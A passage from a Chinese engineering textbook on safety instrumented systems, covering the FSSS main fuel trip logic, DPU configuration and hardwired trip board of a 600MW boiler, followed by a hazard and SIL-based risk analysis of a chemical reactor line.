。FSSS的吹扫控制功能主要是在吹扫前对锅炉的有关设备进行安全 性检查 ,在满足全部吹扫许可条件后 , 开始进行吹扫 。 吹扫时 ,切断所有进入炉膛的燃料输 入 , 吹扫空气流量大于30%且小于40%额定风量 , 吹扫时间不少于5min。 启动吹扫前 ,应至少满足炉膛吹扫许可条件如下: ①应闭锁所有燃料进入炉膛; ②停运 所有提供燃料的设备; ③送风机入口至炉膛 、烟道尾部及烟囱的通道应畅通; ④送引风机至 少应各有一台在运行; ⑤空预器在运行状态; ⑥至少应有 30%的风量; ⑦炉膛负压在正常 限值之内; ⑧除尘器已跳闸; ⑨汽包水位正常; ⑩泄漏试验成功 。 .主燃料跳闸(MFT)。 主燃料跳闸(MFT) 是 FSSS系统中最重要的安全功能 , 当出 现任何危及锅炉或者汽机安全运行的危险工况时 , MFT动作将快速切断所有进入炉膛的燃 料 , 即切断所有煤和油的输入 , 实现紧急停炉 , 以保证设备安全 , 避免重大事故发生 。 同 时 ,该逻辑中具有首次跳闸原因指示功能 , 能对引起主燃料跳闸的最初原因记忆并在显示器 上显示出来 , 为故障原因分析及解决提供了条件 。 当出现下列任一种情况时 ,会引发 MFT: ①二台送风机全停; ②二台引风机全停; ③炉膛压力高(大于+1.25kPa, 三取二); ④炉膛压力低(小于—1.75kPa, 三取二); ⑤汽包水位高(大于+250mm ,水位变送器三取二 ,延时5s); ⑥汽包水位低(小于—250mm ,水位变送器三取二 ,延时5s); ⑦有煤无油时两台一次风机全停; ⑧锅炉总风量小于30% ( <600t/h), 延时3s; ⑨手动 MFT(三取二); ⑩火焰丧失跳闸(煤层无火, 或给煤机停运延时2s); O1燃料丧失跳闸(给煤机或磨煤机全停, 或油阀全关); O12火检冷却风丧失(冷却风压力低低三取二, 或两台冷却风机全停); O13点火失败(油阀打开却无火检, 次数超过3次); O14 汽机跳闸; O15 给水泵全停; O16炉水循环泵故障 。 MFT后, 会引发一系列的设备跳闸和关闭, 从而实现汽机 、锅炉的紧急跳闸: ①发出信号至 MCS,DAS,SCS等各相关子系统, 并报警; ②吹扫完成信号复位; ③停止所有磨煤机; ④停止所有给煤机; ⑤OFT动作, 关燃油跳闸阀和所有角阀 , 闭锁吹扫, 禁止打火; ⑥关闭减温水截止阀和调阀; ⑦闭锁吹灰系统运行, 并退出已投入的吹灰器; ⑧跳汽机; ⑨跳一次风机; ⑩关闭煤粉分离器出口门; O1跳除尘器; O12 开启辅助风挡板并切手动; O13其他相关动作 。 .燃油泄漏试验逻辑 。燃油泄漏试验逻辑是为了保证在炉膛内部无火的情况下, 燃油不 会进入炉膛 。燃油泄漏试验基本上分三步进行, 分别检查燃油进油快关阀 、燃油回油阀 、各 支油枪的油角阀的严密性 。 2)燃烧器控制系统 BCS。燃烧器控制系统包括点火器 、火检系统 、油燃烧系统 、制粉 系统及煤燃烧器 。 .火检是保证油燃烧器和煤燃烧器正常工作的唯一检测手段 。火检信号由就地火焰探测 装置输出两种信号: 开关量信号, 表示有无火焰; 4~20mA信号, 表示火焰强度信号 。 当 燃烧器正常运行 ,火检检测不到有火信号达 2s, 则立即停止该燃烧器运行 , 执行该燃烧器 紧急跳闸动作 , 以免多余的燃料喷射进炉膛而引起爆燃 。火检探头需要由火检冷却风机来冷 却保护 ,否则探头很快会因为灼烧而损坏 。火检冷却风机一运一备 。 当火检冷却风丧失时, 需执行锅炉 MFT来保护火检系统 。 .油燃烧系统包括燃油母管和燃油枪组 。燃油母管控制包括燃油跳闸阀和再循环调节阀 的控制 。燃油跳闸阀在 MFT时紧急关闭, 保证切断至锅炉的燃油 。再循环调节阀控制燃油 流量和各燃油枪前的压力, 保证各油枪正常燃烧 。 600MW 机组锅炉共设三层油燃烧器, 每层四角分布, 共 12支油燃烧器 。 每个油燃烧 器除了配备一个电子高能打火枪外 ,还包括油枪 、油阀 、 吹扫阀 。 在满足燃油点火条件后, 即可发出启动信号 。 在油角阀启动过程中 ,关油阀后必须吹扫 ,是为了清理油枪 , 以免残油流进炉膛影响炉 膛安全 ,或者因为黏性而影响下次点火 。 一般四角切圆的炉膛 ,燃烧器为对角成组进行投运 , 比如油枪 1、3先投 , 2、4再投, 以免炉壁局部受热 。 .制粉系统 , 即主燃料系统 ,包括磨煤机 、给煤机 、一次风机 、密封风机 、润滑油泵及 相关阀门 , 它们的启动 、停止 、跳闸及隔离 、充惰 、清扫过程均有 FSSS系统逻辑控制 。这 些设备的运行可由运行人员通过显示器进行操作 ,整个磨组设备也可由磨组的自动顺序启停 来控制 。磨组的启停是燃料系统中重要的一环 ,对于600MW 机组 ,共 6台磨煤机 , 每台磨 煤机与相应的给煤机等其他配套设施构成一个磨组 ,独立控制 。 磨组的启动允许条件为: ①磨煤机出口温度合适(65~80℃); ②磨煤机润滑油系统满足启动条件; ③密封风/一次风差压合适; ④ 一次风量满足条件(大于65%); ⑤磨煤机出口门全开; ⑥任意密封风机运行; ⑦无 MFT跳闸信号; ⑧无磨组跳闸信号; ⑨煤层点火条件满足(相邻层有火); ⑩其他辅助条件满足 。 磨组的跳闸条件为: ①有 MFT信号; ②RB信号跳磨; ③ 一次风丧失( 一次风/炉膛差压低 ,或一次风机全停); ④密封风与一次风差压低; ⑤磨出口温度太高(大于100℃); ⑥磨风量小(小于50%); ⑦磨出口门2个以上关(包括2个); ⑧煤层火检无火(2个角以上无火); ⑨润滑油系统故障 。 此燃烧器逻辑系统的一大特点是采用分层控制的方式 , 每个层 、组和设备的故障不会影 响整个机组的运行 ,从而大大提高了整体的可靠性和可用率 。 (2) FSSS系统配置 。 电厂600MW 机组 FSSS系统分配了 3对 DPU , 分别为 66号 、 67号 、 68号 。 66号 DPU中包含了 FSS,有 MFT主燃料跳闸逻辑 、OFT燃油跳闸逻辑 、炉膛吹扫逻辑 、RUN- BACK跳磨煤机逻辑 、火检冷却风逻辑 ,还包含了 BCS, 有投油允许条件 、投煤允许条件 、 制粉系统密封风机逻辑 、CD层油燃烧器控制逻辑 。另外 ,包含了强制汽包炉水循环用的三 台炉水循环泵 。 66号 DPU机柜配置如图6-3所示 。66号 DPU卡件布置如图6-4所示 。 图 6-3 66号 DPU机柜配置图 1号卡箱 DPU66/86 30FSSS1控制柜 卡槽号 0 1 2 3 4 5 6 7 8 9 10 11 12 13 卡件类型 DI DI DI DI AI AI DO DO BC BC 信号类型 PL100 TE TE TE MET MET 卡件组号 G20 G200 G01 G01 端子板 位置 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 2F0 2F1 2F2 2F3 2F4 2F5 2F6 2F7 2号卡箱 DPU66/86 30FSSS1控制柜 卡槽号 0 1 2 3 4 5 6 7 8 9 10 11 12 13 卡件类型 DI DI AI AI AI AI DO DO DO DO BC BC 信号类型 MA/V MA/V MA/V MA/V TE MET MET 卡件组号 G1 G1 G1 G1 G01 G01 端子板 位置 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 2B0 2B1 2B2 2B3 2B4 2B5 2B6 2B7 2B8 2B9 图 6-4 66号 DPU卡件配置图 67号 DPU中包含了 BCS,有 AB层油燃烧器控制逻辑 、A/B/C三套制粉系统及煤粉燃 烧器控制逻辑 。67号 DPU卡件配置如图6-5所示 。 1号卡箱 DPU67/87 30FSSS3控制柜 卡槽号 0 1 2 3 4 5 6 7 8 9 10 11 12 13 卡件类型 DI DI DI DI DI DI DO DO DO DO BC BC 信号类型 TE TE MET MET 卡件组号 G01 G01 端子板 位置 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 4F0 4F1 4F2 4F3 4F4 4F5 4F6 4F7 4F8 4F9 2号卡箱 DPU67/87 30FSSS3控制柜 卡槽号 0 1 2 3 4 5 6 7 8 9 10 11 12 13 卡件类型 DI DI DI DI DI AI DO DO DO DO DO BC BC 信号类型 PL100 TE MET MET 卡件组号 G20 G01 G01 端子板 位置 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 4B0 4B1 4B2 4B3 4B4 4B5 4B6 4B7 4B8 4B9 4B10 图 6-5 67号 DPU卡件配置图 68号 DPU中包含了 BCS,有 EF层油燃烧器控制逻辑 、D/E/F三套制粉系统及煤粉燃 烧器控制逻辑 。68号 DPU卡件配置如图6-6所示 。 1号卡箱 DPU68/88 30FSSS5控制柜 卡槽号 0 1 2 3 4 5 6 7 8 9 10 11 12 13 卡件类型 DI DI DI DI DI DI DO DO DO DO BC BC 信号类型 TE TE MET MET 卡件组号 G01 G01 端子板 位置 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 6F0 6F1 6F2 6F3 6F4 6F5 6F6 6F7 6F8 6F9 2号卡箱 DPU68/88 30FSSS5控制柜 卡槽号 0 1 2 3 4 5 6 7 8 9 10 11 12 13 卡件类型 DI DI DI DI DI AI DO DO DO DO DO BC BC 信号类型 PL100 TE MET MET 卡件组号 G20 G01 G01 端子板 位置 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 30FSSS 6B0 6B1 6B2 6B3 6B4 6B5 6B6 6B7 6B8 6B9 6B10 图 6-6 68号 DPU卡件配置图 (3) MFT跳闸板 。 根据以上系统配置 ,可以看出 , 67号 DPU、68号 DPU如果停止工作 ,则锅炉将丧失 一半的燃料 ,但并不是一定要停炉 ,另一半可以支持锅炉继续工作 。而如果66号 DPU因为 故障而停止了 ,整个锅炉系统就失去了监视和保护 ,从而将整个机组和现场的人员置于极大 的风险之中 。 因此只有将锅炉紧急停止 ,才能将机组和人员从危险之中解脱出来 。而锅炉的 停止逻辑只存在于 66号 DPU 中 , 因此 , 必须提供一套可靠的后备的系统 , 来保证 66号DPU停止情况下的安全停炉程序 。 1) MFT跳闸板的功能 。 MFT跳闸板是考虑 DCS两路交流电源都失去或者整个 DCS 图 6-7 MFT跳闸板实物图 瘫痪的最坏情况下 , 专门配备的独立于 DCS的后备跳闸用的 MFT硬跳 闸 回 路 板 , 作 为 锅 炉 保 护 的 最 后 一 道 可 靠 保 障 。 MFT跳闸板的作用是实现在 DCS系统失电时或紧急情况下能 快速切断进入炉膛的燃料供给 ,保证炉膛安全运行 。 MFT硬跳闸板由继电器搭成的硬接线回路构成 , 使用两 路可靠电源工作: FSSS控制柜两路交流切换输出电源 , 机组 蓄电池输出220VDC直流电源 。对燃料供给系统的设备提供 2 种跳闸出口: 交流 MFT继电器输出和直流 MFT继电器输出 。 交流回路和直流回路分别单独工作 。在两路交流电源丧失的情 况下 , 由机组控制最后的保障 ——— 蓄电池提供直流电源 , 使 MFT跳闸板动作 。 同时 DCS系 统 的 软 件 MFT 动 作 输 出 至 跳 闸 板 , 完 成 MFT软件联动 ,从三重冗余角度最大限度地保证 MFT动作的 可靠性 。MFT跳闸板实物如图6-7所示 。 图6-7中 ,下半部第一排接线端子为电源输入和跳闸信号输入 , 它们功能见表6-2。 表 6-2 MFT跳闸板输入输出端子 TB1 信 号 来 自 1、 3 DC220V供电 机组蓄电池组 7、 9 FSSS控制 DPU两路电源失去 FSSS-66号 DPU控制柜 11、 13 DCS两路电源失去 DCS电源柜(锅炉) 19、 21 手动 MFT按钮(触点 1直流用) 操作台 MFT按钮 23、 25 手动 MFT按钮(触点 1直流用) 31、 33 FSSS控制柜电源切换输出 FSSS-66号 DPU控制柜 37、 38 FSSS柜 DPU输出-MFT1 FSSS-66号 DPU端子柜 39、 40 FSSS柜 DPU输出-MFT2 FSSS-66号 DPU端子柜 41、 42 FSSS柜 DPU输出-MFT3 FSSS-66号 DPU端子柜 43、 44 MFT复位输入(交流使用) FSSS-66号 DPU端子柜 45、 46 手动 MFT按钮(触点 2交流用) 操作台 MFT按钮 47、 48 手动 MFT按钮(触点 2交流用) 51~66 DO输出 ,AC/DC失电报警用 下半部第二排接线端子为干结点输出 , 其中 26个常开触点 、8个常闭触点 , 至现场急 停以下设备 ,切断燃料供应: .燃油跳闸阀; .燃油各层总电源(气源); .各磨煤机 、给煤机; . 一次风送粉系统; .其他 MFT跳闸联锁逻辑 。 2) MFT跳闸板的结构 。 以直流回路的 MFT跳闸板为例 , 给出 MFT跳闸板的原理图 如图6-8所示 。 图 6-8 MFT跳闸板的原理图 MFT跳闸板包括电源输入 、手动 MFT硬操输入 、 自保持回路 、FSSS系统电源失去监 视 、MFT三取二回路 、MFT复位软操输入 、MFT复位硬操输入 , 以及直流电源监视回路 等八个部分 。MFT交直流继电器均有自保持回路 , 当发生 MFT后 , MFT继电器一直动 作 。直到 MFT复位信号来后 , MFT继电器才复归 ( MFT硬跳闸板设计为动作合闸型)。 MFT复位信号从 DCS的吹扫完成来 , 只有当 MFT条件不存在后才能复位 。这些回路 , 构 成完整的 MFT硬跳闸回路 ,满足紧急情况下安全停止锅炉的要求 。 电厂 DCS系统中采用“ 得电跳 ” 方式的 MFT跳闸板 , 即需要直流电源作为最后的保 障 ,来使锅炉燃料跳闸 。在一般情况下 ,就地阀门和执行机构失电的安全保护的条件下 , 如 果万一直流电源失去 , 只要就地设备也同步断电 , 锅炉仍然可以依靠就地设备的失电安全 位 ,安全地停下来 。但万一控制部分失电 , 即 DCS和跳闸板都失电 , 而就地设备并未失电, 则将使锅炉处于危险状态 。采用“ 失电跳 ” 的 MFT跳闸板 , 才可以保证这种故障情况下的 安全停炉 。 通过以上安全措施 ,使得 DCS系统的 FSSS子系统 , 可以满足安全功能 SIL3的安全等 级 , 即有效性达到99.9% 。事实上 , 电厂的整个 XDPS系统的有效性为 99.9% ,达到高可靠性控制系统的要求 。 (4) 其他安全措施 。 除了 DCS侧设置了多重的安全跳闸装置外 , 就地的执行设备也都设置了安全程序 。 比 如就地负责燃料供应的阀门或者执行机构 ,一般都用失电关(失气关) 的缺省模式 。在失电 (失气) 状况下 , 回到设备的安全模式 , 阻断燃料进入炉膛 。 这就是IEC61508规范里提到 的故障安全(Fail-Safe) 的概念 。 在 DCS的设计中也需要采用故障安全概念 ,使 DO输出在 DCS失电情况下 ,处于设备 的安全缺省模式 。 比如某个阀门在 DCS失电情况下需要全开 , 以保证系统安全 ,则把该阀 门的开指令接到 DO输出继电器的常闭触点 。 当 DCS要求该阀门打开时 , DO继电器输出 “ 0”, 触点处于闭合状态; 当 DCS要求该阀门关闭时 ,DO继电器输出“ 1”, 触点处于分离 状态; 当 DCS失电时 , DO继电器回到“ 0”, 即触点处于闭合状态 ,该阀门就得到打开的 指令 。 6.1.2 安全自动化技术在安固力化工产品生产中的应用 6.1.2.1 生产过程描述 控制对象是一个复杂的安固力(Acronal) 产品化工反应釜对象 , 它由存储站 、预混釜 、 配置线 、原料存储站 、原料桶加热箱 , 以及混合器 、溶解器 、预混釜 、单体总管 、混合釜 、 调节釜 、换 热 器 、 塔 构 成 , 其 目 的 是 在 符 合 HSEMS( Health, Safety and Environment Management System) 的前提下生产出高质量的化学合成物 。 该系统的控制任务是按照工艺流程的要求 , 首先依照合理的比例配置这种所需的原材 料 。然后 ,将各种单体管内的物料 、催化剂或者经过预反应的物料以一定的比例放置在最终 的反应釜进行反应 ,控制反应釜内温度 、反应釜内的液位 ,保持合适的搅拌速度 ,保证化学 反应可以安全 、正确地进行 。最后 ,把反应生成的化学物质在成品槽区分装成最后的桶装成 品 ,并且处理化工过程中产生的废水 。 上述反应过程可以用49张 P&ID图来描述 ,见表6-3。 表 6-3 化工对象的 P&ID列表 序 号 图 号 图 名 序 号 图 号 图 名 1 991300-1181 丙烯酰胺存储站 14 991300-4111 R41111号调节釜 2 991300-2111 2号预混釜 15 991300-4122 R41222号调节釜 3 991300-2131 SPS配制 16 991300-4132 E4132,F5112A(B) 板式换热器 E4132,F5112A(B) 4 991300-2141 SAB配制 5 991300-2151 TBHP配制 6 991300-2161 维 C存储站 17 991300-5111 T5111塔 7 991300-2391 原料存储站 18 991300-5131 塔顶吸收 8 991300-2531 H2O2 存储站 19 991300-5141 真空冷却 9 991300-2611 原料桶加热箱及混合器 20 991300-6111 杀虫剂存储站 10 991300-2922 淀粉溶解 21 991300-6112 K6111调节釜 11 991300-3111 1号预混釜 22 991300-6122 K6122调节釜 12 991300-3131 单体总管 23 991300-6113 过滤 13 991300-3141 R3141混合釜 24 991300-6115 精过滤 续表 序 号 图 号 图 名 序 号 图 号 图 名 25 991300-7111 成品槽区 38 991300-8200 冷却塔 26 991300-7121 成品槽区 39 991300-8412 高压清洗装置 27 991300-7131 成品槽区 40 991300-8414 高压清洗装置 28 991300-7141 成品槽区 41 991300-8901 蒸汽 29 991300-7151 成品槽区 42 991300-8921 氮气 30 991300-7161 成品槽区 43 991300-8931 除盐水 31 991300-7171 成品槽区 44 991300-8941 压缩空气和仪表空气 32 991300-7181 成品槽区 45 991300-8951 冷却水 33 991300-7191 成品槽区 46 991300-8961 废气吸收 34 991300-7201 成品槽区 47 991300-8971 工艺水和饮用水 35 991300-7516 装桶站 48 991300-8981 低温水 36 991300-7526 槽车装料站 49 991300-9850 废水 37 991300-8111 真空 在对该化工反应过程的控制过程中 ,最重要 、安全隐患最大的控制有以下两部分: (1) 第一部分 。通过电磁阀控制执行阀的开度 , 从而控制油质物料总管中 13根单体管 内物料的流量, 使其按照一定的工艺比例进行混合 。 同时 ,控制水质物料总管中4根单体管 内的物料的流量, 并且按照一定的工艺比例进行混合 。然后, 将油质物料总管和水质物料总 管内的物料先后在 SM3131(固态混合器) 和 XB3132(喷嘴混合器) 中进行搅拌 。需要控 制与 XB3132相连的管道上分别位于上游 、 中游与下游的3个电磁阀 ,从而使喷嘴混合器有 最佳的搅拌质量和最佳的利用率 。 紧接着 ,把在此过程中需要监控各个单体管内的流量 , 运 用 PID控制策略进行闭环控制, 如图6-9所示 。 (2) 第二部分 。 把混合后单体总管内的物料和其他配料按照一定的工艺比例 (比如 DM-Water) 加入最终反应釜 R3141中, 待釜内混合物的质量在 29000~36000kg之间时, 控制变频器使得搅拌机以工艺要求的搅拌速度搅拌反应物 。 同时 ,通过控制蒸汽回路和冷水 回路, 保证反应釜内的温度保持在使得反应在安全的基本前提下以较快的速度进行 。具体的 温度控制策略是: 测量釜底的温度 ,釜底温度的高低立案锁蒸汽回路和冷水回路的电磁阀, 并且测量冷水回路在釜底和釜顶部分的温度 , 以确认冷水管道的制冷设备是否需要启动 。 至 于控制的方法 ,不同于一般对于大型反应釜的双回路控制 , 它采用了 RAMP加 PI控制 。首 先 ,在釜内温度还保持在常温 , 即与期望的反应温度相差甚远时 , 把蒸汽阀的开度设定为 100%附近, 例如95% ,快速使釜内温度上升到设定温度范围的下限附近 , 由于反应釜的测 温通道存在不可忽略的滞后 ,事实上此时系统的温度可能已经超过温度设定范围的下限, 但 庆幸的是它不会超过上限值 。之后 , 采用常规的 PI控制保证系统的温度在设定值范围内 。 采用此单回路的分段控制方式 ,避免了双回路的分层控制方式所需的多信号驱动电磁阀开度 的必要性 , 降低了控制难度和计算的复杂度 ,也方便人工模式下操作工的操作 。 当物料搅拌 完毕时 , 打开底阀 ,把反应生成物送入成品槽区 ,如图6-10所示 。 图6-11是图6-10中反 应釜的截图 。 图 6-9 991300-3131单体总管 P&ID 图 6-10 991300-3141R3141混合釜 P&ID 6.1.2.2 系统风险分析 在这条化工生产线中, 存在很多潜在的危险因素如下 。 (1) 生产现场有爆炸的可能性 。 部分现场仪表 、继电器 、 电磁阀都处于危险区域 。 引起爆炸有3个必要条件, 即足够的点火所需能量 、空气或者氧气 、可燃物或者可燃粉 尘 。 当这3个条件同时具备时, 会发生爆炸 。危险区域的等级分 。0区 (Zone0) 为易爆气体始终或长时间存在; 1区 (Zone1) 为 易燃气体在仪表的正常工作过程中有可能发生或存在; 2区(Zone2) 为一般情形下不存在 易燃气体且即使偶尔发生其存在时间亦很短 。分析合成物反应的化工生产过程 ,可以把生产 现场归为 Zone2; 同时 , 由于其可燃物主要是气体, 所以属于 Zone2ClassⅠ 。 根据可能引爆的最小火花能量 ,我国和欧洲及世界上大部分国家和地区将爆炸性气体分 为四个危险等级见表6-4。 表 6-4 爆炸性气体的四个危险等级 气体分类 代表性气体 最小引爆火花能量 气体分类 代表性气体 最小引爆火花能量 Ⅰ 甲烷 0.280mJ ⅡB 乙烯 0.060mJ ⅡA 丙烷 0.180mJ ⅡC 氢气 0.019mJ 该反应过程的现场的可燃性气体主要是乙烯类易燃气体, 并且可能产生大于 0.060mJ 能量 , 因此属于 ⅡB。 同时 ,根据气体的温度 ,可以划分为六个温度组别 ,见表6-5。 表 6-5 可燃性气体的温度组别 温度组别 安全的物体表面温度 常见爆炸性气体 温度组别 安全的物体表面温度 常见爆炸性气体 T1 ≤450℃ 氢气 、丙烯腈等 46种 T4 ≤135℃ 乙醛 、 四氟乙烯等 6种 T2 ≤300℃ 乙炔 、 乙烯等 47种 T5 ≤100℃ 二硫化碳 T3 ≤200℃ 汽油 、丁烯醛等 36种 T6 ≤85℃ 硝酸乙酯和亚硝酸乙酯 该反应过程的现场的可燃性气体主要是乙烯类易燃气体, 并且安全的物体表面温在 300℃以下, 因此属于 T2。 综上所述, 部分现场区域属于 Zone2ClassⅠ, ⅡBT2。 (2) 管道内可能存在反向流 。 反向流是指上游管道内的物料并非在压力泵的作用下流入下游管道 , 而是往回流 。更加 严重的情况是, 上游管道 A的物料反向流入了上游管道 B,造成在管道进行非正常的化学反 应 。产生反向流的主要原因是压力泵的非正常工作 、与管道相连的反应釜的压力过大 、管道 内的压力过小 。 在该反应过程中 ,会对生成物品质造成严重伤害的是与最终反应釜相连的所有管道内的 反向流 。与最终反应釜相连的管道主要分成两部分: 第一部分是油质物料分送总管, 主要是 油质物料, 一共有13种; 第二部分是水质物料分送总管 , 主要是水质物料 , 一共有 4种 。 每个管道都有形成反向流的可能性 。 (3) 反应釜搅拌的速度过低或者无法正常搅拌 。 当最终的反应釜内的物料已经符合一定的质量要求后 ,需要以一个由工艺工程师给定的 理想搅拌速度搅拌 ,如果搅拌的速度过慢或者没有正常搅拌, 或导致反应不充分甚至生成物 的成分发生改变 。其主要原因是搅拌马达发生故障 。 (4) 最终反应釜的温度太高 。 当最终反应釜的温度过高 ,会对化学反应造成影响 ,导致产物的成分发生改变 。其主要 原因是冷水回路没有正常工作 。 (5) 物料的总量不在期望的限定范围内 。 对某些物料的要求比较高 ,如果它的总量过大或者过小都会使得反应的结果发生改变 。 比如 ,在本化 学 反 应 过 程 中 , DM-water 及 物 料 的 总 量 需 要 被 明 确 规 定 , 如 果 其 大 于 36300kg或者小于29000kg ,都会被人为不符合要求 ,需要关闭所有的单体阀 。 (6) WORSTCASE的所有条件被满足 。 在实际应用中可以发现 , 当多种单独存在并不会引发危险的条件结合到一起时却可能会 造成系统的崩溃 , 而这种组合被定义为 WORSTCASE。 一般的 , 可以由一个衡量因子促发 WORSTCASE, 即当这个参数大于某一个阈值时 , 人为 WORSTCASE已经发生 。 在该化 工反应对象中 ,经过工艺工程师的反复验证 ,WORSTCASE被定义为 CHARANGE = HF/CF ×1.25 >100 HF和CF 分别是某些单体管物料流量与相应权重乘积的算数叠加 。 (7) 传感器的被动故障 。 传感器的被动故障种类和原因各异 , 多是因为在非建议的工作环境下长时间工作或者是 在超过量程的环境下工作 。在被分析的化工反应生产线中主要存在压力表的堵塞 、双金属温 度计的腐蚀以及质量流量计的过压冲刷 ,如图 图 6-12 堵塞住的压力表 6-12~图6-14所示 。 图 6-13 被严重腐蚀的双金属温度计 (8) 执行机构的被动故障 。 执行机构的被动故障分别有阀塞失控 、 限流孔板变形 、控制阀塞气蚀损伤等情况 , 如图 6-15、 图6-16和图6-17所示 。 图 6-14 被压力冲击后的质量流量计 图 6-15 阀塞失控 图 6-16 限流孔板变形 图 6-17 控制阀塞气蚀损伤 (9) 标准的现场总线系统的漏洞 。 在化工生产线中 ,有许多需要安全保护的危险区域塑料工业网版权所有 ,所以安全传感 器 、安全仪表 、安全锁 、急停开关等的使用已经非常普遍 ,但现在连接这些安全设备的控制 系统仍停留在“ 安全继电器 ” 或“ 安全 PLC” 的非总线控制系统的低级控制状态 , 大大限 制了生产过程控制系统的发展 。但如果将这些安全设备连接到非安全的现场总线系统(如标 准的 Profibus、 DeviceNet等总线系统) 上去 , 就会存在比较大的安全隐患 , 是一种非安全 的控制状态 。 (10) 继电器在生命周期内的非正常工作 。 触点接触不良 ,导致继电器在应该吸合的时候没有动作; 或是接点熔结 ,在应该断开的 时候无法断开 。造成与继电器相连的执行机构无法做出正确的动作 ,导致任务的失败 。 (11) 电磁阀在生命周期内的非正常工作 。 线圈柱塞粘连 、 电磁线圈老化 、执行器轴失效 、执行器密封失效 、执行器牵引弹簧失 效 、执行器空气部分失效 、执行器结合部分失效 、 阀门轴失效 、 阀门外密封失效 、 阀门内密 封失效 、 阀门球粘连等 。 (12) PLC的非正常工作 。 PLC相当于系统的大脑 , 需要分析现场的数据 , 并且根据工艺的要求进行判断 , 从 而驱动外设执行最终的动作 , 使得整个生产过程有序地进行 。 然而 , 整个系统对 PLC的 依赖性 , 或者说 PLC在整个系统中的核心地位 , 导致其短时间的非正常工作都可能对整 个系统和生产结果造成不可逆转的后果 。 此外 , 虽然 PLC一般都有很高的可靠性 , 只有 很小的概率可能会发生故障 , 但是由于其失效的严重性是无法忽略的 , 这个威胁必须被 妥善处理 。 6.1.2.3 降低控制对象风险分析 根据表4-1意外事件的风险等级示例和表 4-2风险等级解释以及实际的化工反应对象 的实际要求 ,制定如下所示的风险矩阵 ,见表6-6。 在表6-6中 ,A“ 极端风险 ”对应于IEC61508中建议的等级1“不允许风险”, 风险发 生的可能性极大 、并且其会造成致命的伤亡 ,建议直接改变生产过程或者使用 SIL4的安全 防护措施 。然而从经济与安全的角度考虑 ,更加建议直接改变生产过程 ,从源头上防止此类 极高风险的不可接受的风险的产生 。 表 6-6 风 险 矩 阵 注 A— 极端风险 ,必须改变生产过程或者使用 SIL4级的安全防护设施 ; B— 非常高的风险, 改变生产过程或是使用 SIL3级的安全防护设施 ; C— 高风险 , 改变生产过程或者使用 SIL2级的安全防护设施 ;D— 重大但是可接受的风险 ,使用监测装置 ;E— 小的可接受风 险 ,在有必要时使用监测装置 ; F— 很小的风险 ,不用予以关注 ;S1— 致命的伤亡 ; S2— 严重的伤害 ;S3— 可逆转的伤害 ;S4— 轻微的伤害 。 B“ 非常高的风险 ” 对应于IEC61508中建议的等级 2“ 不期望风险”, 当 SIL3级的安 全防护措施的成本小于修改生产过程的成本时安装安全防护措施 , 否则 直 接 改 变 生 产 过程 。 C“高风险 ”对应于IEC61508中建议的等级3“如果风险降低的成本超过取得的改善时 允许的风险”。 这类危险可以通过直接改变生产过程或者使用 SIL2级的安全防护措施来降低 风险 ,可以根据系统设计的整体要求以及性价比选择其中的一种手法 。并且 ,风险的改善带 来的经济效应高于采取的风险改善措施 。 D“ 重大但是可以接受的风险 ” 对应于IEC61508中建议的等级“ 如果风险降低的成本 超过取得的改善时允许的风险”, 并且其风险降低的成本远高于处理风险的成本 。 因此 , 采 用监测的手段 , 以及时发现错误 。 E“ 小的但可以接受的风险 ” 对应于IEC61508中建议的等级“ 如果风险降低的成本超 过取得的改善时允许的风险”, 并且其风险降低的成本远高于处理风险的成本 。 同时 , 由于 其风险指数比较低 , 只需要对部分风险采取监测手段 。 F“很小的风险 ”对应于IEC61508中建议的等级“ 可忽略的风险”, 不用对其采取任何 措施 。 按照风险的危害程度及可能发生的频率 , 可以定量地分析每个风险的风险级别并且确 定相应安全措施 。 然而事实上 , 定量风险评估是整个功能安全管理的薄弱环节 , 直接影 响了功能安全评估的效果 。 我国已对重大火灾爆炸事故后果的定量进行了全面研究 , 建 立了6种伤害模型 , 但缺少事故发生概率的数据 , 而引发这些重大事故的危险事件发生频 率数据更是缺乏 。 而且重大危险源评价模型或道化学火灾 、爆炸指数评价法中的抵消因 子 (补偿系数) 虽然考虑了安全控制系统的作用 , 但不是对其基于风险的量化 , 而是把 安全控制系统定位于安全补偿 , 与受控系统一起考虑安全控制系统的安全补偿作用 , 没 有对安全控制系统自身进行单独 、 客观的评估 。 如果整体安全控制系统已经是过安全保 护 , 那么这种考虑就欠合理 、不够经济 。 因此 , 需要按照功能安全管理的理念进行重大 危险源评估 , 这就要求研究开发定量风险评价方法 , 同时收集整理危险事件发生概率及 后果的基础量化数据 , 并建立数据库 。 由于无法得到该系统风险评估所需的定量数据 , 只能按照上述提到的风险矩阵拟定相应 的风险降低技术和实际的操作 ,其结果见表6-7。 表 6-7 化工反应釜对象风险降低技术的确定 危险因素 风险级别 建议措施 实际的操作 风险降低技术 生产现场有爆炸的 可能性 A 直接改变生产过程 在危险区域采用本 安仪表 (限制火花的 能量) 隔离栅 由外 部 风 险 降 低 设 备 负担的风险降低部分 管道内可能存在反 向流 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全联锁系统 * 安全系统总线 由 E/E/PE 安 全 相 关 系统负 担 的 风 险 降 低 部 分 SIL3 反应釜搅拌的速度过 低或者无法正常搅拌 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全联锁系统 * 安全系统总线 最终反应釜的温度 太高 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全联锁系统 * 安全系统总线 物料的总量不在期 望的限定范围内 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全联锁系统 * 安全系统总线 WORSTCASE的所 有条件被满足 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全联锁系统 * 安全系统总线 传感器的被动故障 B 直接改变生产过程 , 或 者 SIL3级安全设备 冗余 安全系统总线 其他 技 术 安 全 相 关 系 统负担 的 风 险 降 低 部 分 SIL2或 SIL3 执 行 机 构 的 被 动 故障 B 直接改变生产过程 , 或 者 